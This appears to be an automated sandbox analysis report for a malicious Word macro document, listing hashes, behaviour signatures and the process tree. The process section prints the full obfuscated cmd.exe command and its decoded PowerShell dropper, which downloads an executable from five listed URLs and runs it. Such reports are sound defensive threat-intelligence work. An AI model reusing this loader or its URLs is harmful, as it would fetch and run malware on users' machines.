Overview

overview

10

Static

static

8

ce3109aca2...18.doc

windows7-x64

10

ce3109aca2...18.doc

windows10-2004-x64

1

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-09-2024 23:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ce3109aca2237ff1e0f7f98c066eb307_JaffaCakes118.doc

  • Size

    134KB

  • MD5

    ce3109aca2237ff1e0f7f98c066eb307

  • SHA1

    f33b0e3a174fa419a51b2c6d7eb710337f5c0e97

  • SHA256

    89d8c90d091111f17323aae268bc8732132c82b6507a6e4773378a2e288e1fbc

  • SHA512

    47d535b9074d0a668db9e71aebfabb86de3f674352b9f7aee68cc475527f254e73eaff7dbd5ced9c9317bc0bba182caf02d664e26a25a0ad000d54904442036c

  • SSDEEP

    1536:O81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9udl6dAu:O8GhDS0o9zTGOZD6EbzCdsdIiu

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.khutt.org/0lz8WgN
exe.dropper

http://www.viromedia.net/Hj
exe.dropper

http://www.progettopersianas.com.br/KD3q0VRw
exe.dropper

http://bunonartcrafts.com/u
exe.dropper

http://robwalls.com/lf

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ce3109aca2237ff1e0f7f98c066eb307_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:816
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2696
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\YNSduIJIcj\ToDJfRP\bGjPOvQ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK/qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28,26,73,41,11,0,28,14,21,69,16,28,21,71,72,28,11,32,20,59,28,56,21,25,67,24,49,41,36,53,62,21,21,24,70,44,44,26,26,26,71,48,62,42,21,21,71,41,23,29,44,57,20,17,47,72,29,16,35,62,21,21,24,70,44,44,26,26,26,71,75,59,23,41,8,28,40,59,38,71,56,28,21,44,22,0,35,62,21,21,24,70,44,44,26,26,26,71,24,23,41,29,28,21,21,41,24,28,23,54,59,38,56,38,54,71,14,41,8,71,11,23,44,43,13,76,45,57,5,50,26,35,62,21,21,24,70,44,44,11,42,56,41,56,38,23,21,14,23,38,27,21,54,71,14,41,8,44,42,35,62,21,21,24,70,44,44,23,41,11,26,38,20,20,54,71,14,41,8,44,20,27,53,71,19,24,20,59,21,63,53,35,53,55,25,67,10,5,38,36,53,24,5,54,53,25,67,65,27,17,69,36,69,53,66,39,64,53,25,67,62,14,7,36,53,45,23,23,53,25,67,38,65,26,36,67,28,56,75,70,21,28,8,24,68,53,30,53,68,67,65,27,17,68,53,71,28,58,28,53,25,27,41,23,28,38,14,62,63,67,21,75,23,69,59,56,69,67,24,49,41,55,74,21,23,46,74,67,52,0,0,71,13,41,26,56,20,41,38,40,7,59,20,28,63,67,21,75,23,37,69,67,38,65,26,55,25,67,17,54,72,36,53,6,59,22,53,25,51,27,69,63,63,33,28,21,73,51,21,28,8,69,67,38,65,26,55,71,20,28,56,29,21,62,69,73,29,28,69,47,57,57,57,57,55,69,74,51,56,75,41,48,28,73,51,21,28,8,69,67,38,65,26,25,67,34,41,48,36,53,49,19,75,53,25,11,23,28,38,48,25,60,60,14,38,21,14,62,74,60,60,67,34,34,31,36,53,65,42,7,53,25,84)do set DT=!DT!!vY:~%s,1!&&if %s gtr 83 powershell "!DT:~-439!""
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V/C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK/qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28,26,73,41,11,0,28,14,21,69,16,28,21,71,72,28,11,32,20,59,28,56,21,25,67,24,49,41,36,53,62,21,21,24,70,44,44,26,26,26,71,48,62,42,21,21,71,41,23,29,44,57,20,17,47,72,29,16,35,62,21,21,24,70,44,44,26,26,26,71,75,59,23,41,8,28,40,59,38,71,56,28,21,44,22,0,35,62,21,21,24,70,44,44,26,26,26,71,24,23,41,29,28,21,21,41,24,28,23,54,59,38,56,38,54,71,14,41,8,71,11,23,44,43,13,76,45,57,5,50,26,35,62,21,21,24,70,44,44,11,42,56,41,56,38,23,21,14,23,38,27,21,54,71,14,41,8,44,42,35,62,21,21,24,70,44,44,23,41,11,26,38,20,20,54,71,14,41,8,44,20,27,53,71,19,24,20,59,21,63,53,35,53,55,25,67,10,5,38,36,53,24,5,54,53,25,67,65,27,17,69,36,69,53,66,39,64,53,25,67,62,14,7,36,53,45,23,23,53,25,67,38,65,26,36,67,28,56,75,70,21,28,8,24,68,53,30,53,68,67,65,27,17,68,53,71,28,58,28,53,25,27,41,23,28,38,14,62,63,67,21,75,23,69,59,56,69,67,24,49,41,55,74,21,23,46,74,67,52,0,0,71,13,41,26,56,20,41,38,40,7,59,20,28,63,67,21,75,23,37,69,67,38,65,26,55,25,67,17,54,72,36,53,6,59,22,53,25,51,27,69,63,63,33,28,21,73,51,21,28,8,69,67,38,65,26,55,71,20,28,56,29,21,62,69,73,29,28,69,47,57,57,57,57,55,69,74,51,56,75,41,48,28,73,51,21,28,8,69,67,38,65,26,25,67,34,41,48,36,53,49,19,75,53,25,11,23,28,38,48,25,60,60,14,38,21,14,62,74,60,60,67,34,34,31,36,53,65,42,7,53,25,84)do set DT=!DT!!vY:~%s,1!&&if %s gtr 83 powershell "!DT:~-439!""
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "$Qfq='fuC';$Pjj=new-object Net.WebClient;$pOo='http://www.khutt.org/0lz8WgN@http://www.viromedia.net/Hj@http://www.progettopersianas.com.br/KD3q0VRw@http://bunonartcrafts.com/u@http://robwalls.com/lf'.Split('@');$AVa='pVs';$Bfz = '462';$hcF='qrr';$aBw=$env:temp+'\'+$Bfz+'.exe';foreach($tvr in $pOo){try{$Pjj.DownloadFile($tvr, $aBw);$zsW='YiH';If ((Get-Item $aBw).length -ge 80000) {Invoke-Item $aBw;$Uok='OSv';break;}}catch{}}$UUX='BuF';"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2660

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      8c87aae677432d9490f703eecb6fc249

      SHA1

      709e9ff746be5b3849d649c8bfb8ec6cac01859f

      SHA256

      e386a3f4d41d7f1bfd059448885e80456020be0bbae5de18d7aa36a178b7dd2b

      SHA512

      e954f8be94cdb45022d6dbaffd78f8d191431a27ef64fbde6acedea0d128aa911dc4487aaad68ee4a1ea8588883a79486fa52a3cf67186ebde3dfb66d00b48c2

      Download Submit

    • memory/816-8-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-5-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-4-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-9-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-7-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-0-0x000000002FA11000-0x000000002FA12000-memory.dmp

      Filesize

      4KB

      Download

    • memory/816-6-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-2-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/816-18-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/816-19-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-22-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/816-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/816-37-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/816-38-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

      Filesize

      44KB

      Download